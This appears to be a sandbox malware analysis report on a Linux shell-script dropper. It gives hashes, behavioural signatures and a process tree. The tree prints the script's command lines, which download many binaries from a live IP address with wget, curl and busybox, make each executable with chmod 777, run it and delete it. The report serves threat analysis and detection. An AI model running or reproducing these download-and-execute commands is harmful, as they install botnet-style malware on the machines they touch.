Analysis
-
max time kernel
30s -
max time network
57s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system -
submitted
10-11-2024 01:07
Static task
static1
Behavioral task
behavioral1
Sample
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
-
Size
10KB
-
MD5
28da49fd9438da5ee3fa13fc53b5bd0c
-
SHA1
bdd8fdf541c1c40a2327d0e17239da521f2a36cd
-
SHA256
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d
-
SHA512
4e766537fa0871ce6cdf5c1ecd6605929600ce0e87b186b266f60fa72176f4ab499fd59c622b87fe08a5b10649e76c435768fb44dfbe90f513a08f17e3abc405
-
SSDEEP
96:gAsnGO60kOLUak421tkCWXLlkkPBN9ckCNwbTzzkcdfXLlkk8gBN9ckCFTgKYfkp:YQCCWXLlkk0NwbTvkclXLlkk+6kcaz28
Malware Config
Signatures
-
File and Directory Permissions Modification (1 TTP, 18 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process):
- 743 chmod
- 800 chmod
- 806 chmod
- 812 chmod
- 850 chmod
- 874 chmod
- 699 chmod
- 818 chmod
- 885 chmod
- 775 chmod
- 830 chmod
- 838 chmod
- 856 chmod
- 868 chmod
- 794 chmod
- 824 chmod
- 844 chmod
- 862 chmod
Executes dropped EXE (18 IoCs)
Processes (pid, process, path):
- 700 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR (/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR)
- 745 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b (/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b)
- 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy (/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy)
- 795 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X (/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X)
- 801 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w (/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w)
- 807 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda (/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda)
- 813 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs)
- 819 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM)
- 825 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C)
- 831 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp (/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp)
- 839 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK (/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK)
- 845 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE)
- 851 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe (/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe)
- 857 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw (/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw)
- 863 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM)
- 869 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C)
- 875 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs)
- 886 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE)
Checks CPU configuration (1 TTP, 18 IoCs)
Checks CPU information, which can indicate whether the system is a virtual machine.
Processes (description, ioc, process):
- File opened for reading /proc/cpuinfo curl (18 identical entries, one per curl process)
Reads runtime system information
Processes (description, ioc, process):
- File opened for reading /proc/self/auxv curl (18 entries)
- File opened for reading /proc/sys/crypto/fips_enabled curl (18 entries)
Writes file to tmp directory (18 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process):
- File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C curl
- File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy curl
- File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp curl
- File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE curl
- File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs curl
- File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b curl
- File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda curl
- File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C curl
- File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM curl
- File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X curl
- File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK curl
- File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe curl
- File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM curl
- File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw curl
- File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE curl
- File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR curl
- File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w curl
- File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs curl
Processes
Process tree (executable: command line, PID; matched signatures in brackets; child processes are indented under the script):
- /tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh: /tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh (PID 668)
  - /bin/rm: /bin/rm bins.sh (PID 670)
  - /usr/bin/wget: wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR (PID 672)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR (PID 690) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR (PID 697)
  - /bin/chmod: chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR (PID 699) [File and Directory Permissions Modification]
  - /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR: ./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR (PID 700) [Executes dropped EXE]
  - /bin/rm: rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR (PID 701)
  - /usr/bin/wget: wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b (PID 702)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b (PID 703) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b (PID 710)
  - /bin/chmod: chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b (PID 743) [File and Directory Permissions Modification]
  - /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b: ./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b (PID 745) [Executes dropped EXE]
  - /bin/rm: rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b (PID 746)
  - /usr/bin/wget: wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy (PID 748)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy (PID 754) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy (PID 755)
  - /bin/chmod: chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy (PID 775) [File and Directory Permissions Modification]
  - /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy: ./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy (PID 777) [Executes dropped EXE]
  - /bin/rm: rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy (PID 778)
  - /usr/bin/wget: wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X (PID 779)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X (PID 792) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X (PID 793)
  - /bin/chmod: chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X (PID 794) [File and Directory Permissions Modification]
  - /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X: ./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X (PID 795) [Executes dropped EXE]
  - /bin/rm: rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X (PID 796)
  - /usr/bin/wget: wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w (PID 797)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w (PID 798) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w (PID 799)
  - /bin/chmod: chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w (PID 800) [File and Directory Permissions Modification]
  - /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w: ./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w (PID 801) [Executes dropped EXE]
  - /bin/rm: rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w (PID 802)
  - /usr/bin/wget: wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda (PID 803)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda (PID 804) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda (PID 805)
  - /bin/chmod: chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda (PID 806) [File and Directory Permissions Modification]
  - /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda: ./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda (PID 807) [Executes dropped EXE]
  - /bin/rm: rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda (PID 808)
  - /usr/bin/wget: wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 809)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 810) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 811)
  - /bin/chmod: chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 812) [File and Directory Permissions Modification]
  - /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs: ./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 813) [Executes dropped EXE]
  - /bin/rm: rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 814)
  - /usr/bin/wget: wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 815)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 816) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 817)
  - /bin/chmod: chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 818) [File and Directory Permissions Modification]
  - /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM: ./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 819) [Executes dropped EXE]
  - /bin/rm: rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 820)
  - /usr/bin/wget: wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 821)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 822) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 823)
  - /bin/chmod: chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 824) [File and Directory Permissions Modification]
  - /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C: ./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 825) [Executes dropped EXE]
  - /bin/rm: rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 826)
  - /usr/bin/wget: wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp (PID 827)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp (PID 828) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp (PID 829)
  - /bin/chmod: chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp (PID 830) [File and Directory Permissions Modification]
  - /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp: ./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp (PID 831) [Executes dropped EXE]
  - /bin/rm: rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp (PID 832)
  - /usr/bin/wget: wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK (PID 833)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK (PID 835) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK (PID 837)
  - /bin/chmod: chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK (PID 838) [File and Directory Permissions Modification]
  - /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK: ./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK (PID 839) [Executes dropped EXE]
  - /bin/rm: rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK (PID 840)
  - /usr/bin/wget: wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 841)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 842) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 843)
  - /bin/chmod: chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 844) [File and Directory Permissions Modification]
  - /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE: ./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 845) [Executes dropped EXE]
  - /bin/rm: rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 846)
  - /usr/bin/wget: wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe (PID 847)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe (PID 848) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe (PID 849)
  - /bin/chmod: chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe (PID 850) [File and Directory Permissions Modification]
  - /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe: ./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe (PID 851) [Executes dropped EXE]
  - /bin/rm: rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe (PID 852)
  - /usr/bin/wget: wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw (PID 853)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw (PID 854) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw (PID 855)
  - /bin/chmod: chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw (PID 856) [File and Directory Permissions Modification]
  - /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw: ./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw (PID 857) [Executes dropped EXE]
  - /bin/rm: rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw (PID 858)
  - /usr/bin/wget: wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 859)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 860) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 861)
  - /bin/chmod: chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 862) [File and Directory Permissions Modification]
  - /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM: ./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 863) [Executes dropped EXE]
  - /bin/rm: rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM (PID 864)
  - /usr/bin/wget: wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 865)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 866) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 867)
  - /bin/chmod: chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 868) [File and Directory Permissions Modification]
  - /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C: ./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 869) [Executes dropped EXE]
  - /bin/rm: rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C (PID 870)
  - /usr/bin/wget: wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 871)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 872) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 873)
  - /bin/chmod: chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 874) [File and Directory Permissions Modification]
  - /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs: ./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 875) [Executes dropped EXE]
  - /bin/rm: rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs (PID 876)
  - /usr/bin/wget: wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 877)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 878) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 884)
  - /bin/chmod: chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 885) [File and Directory Permissions Modification]
  - /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE: ./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 886) [Executes dropped EXE]
  - /bin/rm: rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE (PID 887)
  - /usr/bin/wget: wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe (PID 888)
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97